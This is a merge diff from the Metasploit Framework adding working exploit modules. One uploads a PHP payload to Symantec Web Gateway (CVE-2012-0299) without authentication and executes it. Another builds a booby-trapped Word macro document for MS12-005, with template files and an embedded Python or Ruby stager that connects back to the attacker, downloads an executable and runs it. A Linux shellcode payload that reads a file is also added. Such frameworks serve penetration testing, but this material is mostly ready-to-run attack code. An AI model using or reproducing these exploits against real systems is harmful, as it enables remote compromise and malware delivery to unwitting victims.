Merge branch 'master' into feature/vuln-info

2012-06-10 12:54:58 -05:00 · 2012-06-10 12:54:58 -05:00 · beefea6fb9
parent 4f55452153 15fa178a66
commit beefea6fb9
20 changed files with 475 additions and 0 deletions
--- a/data/exploits/CVE-2012-0013/[Content_Types].xml
+++ b/data/exploits/CVE-2012-0013/[Content_Types].xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="emf" ContentType="image/x-emf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/stylesWithEffects.xml" ContentType="application/vnd.ms-word.stylesWithEffects+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
--- a/data/exploits/CVE-2012-0013/_rels/__rels
+++ b/data/exploits/CVE-2012-0013/_rels/__rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
--- a/data/exploits/CVE-2012-0013/docProps/app.xml
+++ b/data/exploits/CVE-2012-0013/docProps/app.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>1</TotalTime><Pages>1</Pages><Words>2</Words><Characters>13</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>14</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>
--- a/data/exploits/CVE-2012-0013/docProps/core.xml
+++ b/data/exploits/CVE-2012-0013/docProps/core.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>Windows User</dc:creator><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>2</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:modified></cp:coreProperties>
--- a/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels
+++ b/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/></Relationships>
--- a/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels
+++ b/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>
--- a/data/exploits/CVE-2012-0013/word/document.xml
+++ b/data/exploits/CVE-2012-0013/word/document.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p w:rsidR="00EB5F66" w:rsidRDefault="006042EE"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:r><w:rPr><w:noProof/></w:rPr><w:pict><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:80.2pt;height:40.5pt;z-index:-251657216;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text"><v:imagedata r:id="rId6" o:title=""/></v:shape><o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/></w:pict></w:r><w:bookmarkEnd w:id="0"/><w:r><w:t>W00TW00T</w:t></w:r></w:p><w:sectPr w:rsidR="00EB5F66"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
--- a/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin
+++ b/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin
--- a/data/exploits/CVE-2012-0013/word/fontTable.xml
+++ b/data/exploits/CVE-2012-0013/word/fontTable.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
--- a/data/exploits/CVE-2012-0013/word/media/image1.emf
+++ b/data/exploits/CVE-2012-0013/word/media/image1.emf
--- a/data/exploits/CVE-2012-0013/word/settings.xml
+++ b/data/exploits/CVE-2012-0013/word/settings.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="002B771F"/><w:rsid w:val="002B771F"/><w:rsid w:val="006042EE"/><w:rsid w:val="00EB5F66"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1027"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>
--- a/data/exploits/CVE-2012-0013/word/styles.xml
+++ b/data/exploits/CVE-2012-0013/word/styles.xml
--- a/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml
+++ b/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml
--- a/data/exploits/CVE-2012-0013/word/theme/theme1.xml
+++ b/data/exploits/CVE-2012-0013/word/theme/theme1.xml
--- a/data/exploits/CVE-2012-0013/word/vbaData.xml
+++ b/data/exploits/CVE-2012-0013/word/vbaData.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
--- a/data/exploits/CVE-2012-0013/word/vbaProject.bin
+++ b/data/exploits/CVE-2012-0013/word/vbaProject.bin
--- a/data/exploits/CVE-2012-0013/word/webSettings.xml
+++ b/data/exploits/CVE-2012-0013/word/webSettings.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:optimizeForBrowser/><w:allowPNG/></w:webSettings>
--- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
@ -0,0 +1,126 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",
+			'Description'    => %q{
+					This module exploits a file upload vulnerability found in Symantec Web Gateway's
+				HTTP service. Due to the incorrect use of file extensions in the upload_file()
+				function, this allows us to abuse the spywall/blocked_file.php file in order to
+				upload a malicious PHP file without any authentication, which results in arbitrary
+				code execution.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Tenable Network Security', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-0299' ],
+					[ 'OSVDB', '82025' ],
+					[ 'BID', '53443' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-091' ],
+					[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "none"
+				},
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					['Symantec Web Gateway 5.0.2.8', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "May 17 2012",
+			'DefaultTarget'  => 0))
+	end
+
+
+	def check
+		res = send_request_raw({
+			'method' => 'GET',
+			'uri'    => '/spywall/login.php'
+		})
+
+		if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def on_new_session(client)
+		if client.type == "meterpreter"
+			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+			client.fs.file.rm("temp.php")
+		else
+			client.shell_command_token("rm temp.php")
+		end
+	end
+
+	def exploit
+		uri = target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		peer = "#{rhost}:#{rport}"
+		payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
+		before_filename = rand_text_alpha(rand(10) + 5)
+		after_filename = rand_text_alpha(rand(10) + 5)
+
+		post_data = Rex::MIME::Message.new
+		post_data.add_part("true", nil, nil, "form-data; name=\"submitted\"")
+		post_data.add_part(before_filename, "application/octet-stream", nil, "form-data; name=\"before_filename\"")
+		post_data.add_part(after_filename, "application/octet-stream", nil, "form-data; name=\"after_filename\"")
+		post_data.add_part("<?php #{payload.encoded} ?>", "image/gif", nil, "form-data; name=\"new_image\"; filename=\"#{payload_name}\"")
+
+		print_status("#{peer} - Sending PHP payload (#{payload_name})")
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => "#{uri}spywall/blocked_file.php",
+			'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+			'data'   => post_data.to_s
+		})
+
+		# If the server returns 200 and the body contains the name
+		# of the default file, we assume we uploaded the malicious
+		# file successfully
+		if not res or res.code != 200 or res.body !~ /temp.php/
+			print_error("#{peer} - File wasn't uploaded, aborting!")
+			return
+		end
+
+		print_status("#{peer} - Executing PHP payload (#{payload_name})")
+		# Execute our payload
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{uri}spywall/images/upload/temp/temp.php"
+		})
+
+		# If we don't get a 200 when we request our malicious payload, we suspect
+		# we don't have a shell, either.  Print the status code for debugging purposes.
+		if res and res.code != 200
+			print_status("#{peer} - Server returned #{res.code.to_s}")
+		end
+	end
+
+end
--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@ -0,0 +1,250 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::FILEFORMAT
+	include Msf::Exploit::EXE
+	include Msf::Exploit::Remote::TcpServer
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",
+			'Description'    => %q{
+					This module exploits a vulnerability found in Microsoft Office's ClickOnce
+				feature.  When handling a Macro document, the application fails to recognize
+				certain file extensions as dangerous executables, which can be used to bypass
+				the warning message.  This allows you to trick your victim into opening the
+				malicious document, which will load up either a python or ruby payload based on
+				your choosing, and then finally download and execute our executable.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Yorick Koster', #Vuln discovery
+					'sinn3r'         #Metasploit
+				],
+			'References'     =>
+				[
+					['CVE', '2012-0013'],
+					['OSVDB', '78207'],
+					['MSB', 'ms12-005'],
+					['BID', '51284'],
+					['URL', 'http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146'],
+					['URL', 'http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/']
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction'          => "none",
+					'DisablePayloadHandler' => 'false'
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Microsoft Office Word 2007/2010 on Windows 7', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jan 10 2012",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptEnum.new('PAYLOAD_TYPE', [true, "The initial payload type", 'PYTHON', %w(RUBY PYTHON)]),
+					OptString.new("BODY", [false, 'The message for the document body', '']),
+					OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
+				], self.class)
+	end
+
+
+	#
+	# Return the first-stage payload that will download our malicious executable.
+	#
+	def get_download_exec_payload(type, lhost, lport)
+		payload_name = Rex::Text.rand_text_alpha(7)
+
+		# Padd up 6 null bytes so the first few characters won't get cut off
+		p = "\x00"*6
+
+		case type
+		when :rb
+			p << %Q|
+			require 'socket'
+			require 'tempfile'
+			begin
+				cli = TCPSocket.open("#{lhost}",#{lport})
+				buf = ''
+				while l = cli.gets
+					buf << l
+				end
+				cli.close
+				tmp = Tempfile.new(['#{payload_name}','.exe'])
+				t = tmp.path
+				tmp.binmode
+				tmp.write(buf)
+				tmp.close
+				exec(t)
+			rescue
+			end#|
+
+		when :py
+			p << %Q|
+			import socket
+			import tempfile
+			import os
+
+			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+			s.connect(("#{lhost}", #{lport}))
+			buf = ""
+			while True:
+				data = s.recv(1024)
+				if data:
+					buf += data
+				else:
+					break
+			s.close
+			temp = tempfile.gettempdir() + "\\\\\\" + "#{payload_name}.exe"
+			f = open(temp, "wb")
+			f.write(buf)
+			f.close
+			f = None
+			os.system(temp)
+			#|
+
+		end
+
+		p = p.gsub(/^\t\t\t/, '')
+
+		return p
+	end
+
+
+	#
+	# Reads a file that'll be packaged.
+	# This will patch certain files on the fly, or return the original content of the file.
+	#
+	def on_file_read(fname, file)
+		f = open(file, 'rb')
+		buf = f.read
+		f.close
+
+		# Modify certain files on the fly
+		case file
+		when /oleObject1\.bin/
+			# Patch the OLE object file with our payload
+			print_status("Patching OLE object")
+			ptype = datastore['PAYLOAD_TYPE'] == 'PYTHON' ? :py : :rb
+			p     = get_download_exec_payload(ptype, @ip, @port)
+			buf   = buf.gsub(/MYPAYLOAD/, p)
+
+			# Patch username
+			username = Rex::Text.rand_text_alpha(5)
+			buf = buf.gsub(/METASPLOIT/, username)
+			buf = buf.gsub(/#{Rex::Text.to_unicode("METASPLOIT")}/, Rex::Text.to_unicode(username))
+
+			# Patch the filename
+			f = Rex::Text.rand_text_alpha(6)
+			buf = buf.gsub(/MYFILENAME/, f)
+			buf = buf.gsub(/#{Rex::Text.to_unicode("MYFILENAME")}/, Rex::Text.to_unicode(f))
+
+			# Patch the extension name
+			ext = ptype.to_s
+			buf = buf.gsub(/MYEXT/, ext)
+			buf = buf.gsub(/#{Rex::Text.to_unicode("MYEXT")}/, Rex::Text.to_unicode(ext))
+
+		when /document\.xml/
+			print_status("Patching document body")
+			# Patch the docx body
+			buf = buf.gsub(/W00TW00T/, datastore['BODY'])
+
+		end
+
+		# The original filename of __rels is actually ".rels".
+		# But for some reason if that's our original filename, it won't be included
+		# in the archive. So this hacks around that.
+		case fname
+		when /__rels/
+			fname = fname.gsub(/\_\_rels/, '.rels')
+		end
+
+		yield fname, buf
+	end
+
+
+	#
+	# Packages the Office Macro Document
+	#
+	def package_docm_rex(path)
+		zip = Rex::Zip::Archive.new
+
+		Dir["#{path}/**/**"].each do |file|
+			p = file.sub(path+'/','')
+
+			if File.directory?(file)
+				print_status("Packging directory: #{file}")
+				zip.add_file(p)
+			else
+				on_file_read(p, file) do |fname, buf|
+					print_status("Packaging file: #{fname}")
+					zip.add_file(fname, buf)
+				end
+			end
+		end
+
+		zip.pack
+	end
+
+
+	#
+	# Return the malicious executable
+	#
+	def on_client_connect(cli)
+		print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@exe.length.to_s} bytes)")
+		cli.put(@exe)
+		service.close_client(cli)
+	end
+
+
+	def exploit
+		@ip    = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+		@port  = datastore['SRVPORT']
+
+		print_status("Generating our docm file...")
+		path  = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2012-0013')
+		docm = package_docm_rex(path)
+
+		file_create(docm)
+		print_good("Let your victim open #{datastore['FILENAME']}")
+
+		print_status("Generating our malicious executable...")
+		@exe = generate_payload_exe
+
+		print_status("Ready to deliver your payload on #{@ip}:#{@port.to_s}")
+		super
+	end
+end
+
+=begin
+mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c 
+1c1
+< void *__thiscall CPackage::_GetCurrentIcon(void *this, int a2)
+---
+> const WCHAR *__thiscall CPackage::_GetCurrentIcon(void *this, int a2)
+...
+24c24
+<     if ( AssocIsDangerous(result) || !SHGetFileInfoW(pszPath, 0x80u, &psfi, 0x2B4u, 0x110u) )
+---
+>     if ( IsProgIDInList(0, result, extList, 0x11u) || !SHGetFileInfoW(pszPath, 0x80u, &psfi, 0x2B4u, 0x110u) )
+31c31
+=end
--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@ -0,0 +1,71 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Read File',
+			'Version'       => '',
+			'Description'   => 'Read a file from the local file system, and write it back out to the specified file descriptor',
+			'Author'        => 'hal',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86))
+
+		# Register exec options
+		register_options(
+			[
+				OptString.new('FILE',   [ true,  "The file to read" ]),
+				OptString.new('FD',     [ false,  "The file descriptor to write output to" ]),
+			], self.class)
+	end
+
+	def generate_stage
+		fd = datastore['FD'] || 1
+
+		payload_data =<<-EOS
+			jmp file
+
+			open:
+				mov eax,0x5       ; open() syscall
+				pop ebx           ; Holds the filename
+				xor ecx,ecx       ; Open for reading (0) 
+				int 0x80
+
+			read:
+				mov ebx,eax       ; Store the open fd
+				mov eax,0x3       ; read() syscall
+				mov edi,esp       ; We're just going to save on the stack
+				mov ecx,edi       ; Save at edi
+				mov edx,0x1000    ; Read as much as we can
+				int 0x80
+
+			write:
+				mov edx,eax       ; Number of bytes to write
+				mov eax,0x4       ; write() system call
+				mov ebx,#{fd}     ; fd to write to
+				int 0x80
+
+			exit:
+				mov eax,0x1       ; exit() system call
+				mov ebx,0x0       ; return 0
+				int 0x80
+
+			file:
+				call open
+				db "#{datastore['FILE']}", 0x00
+		EOS
+
+		Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
+	end
+end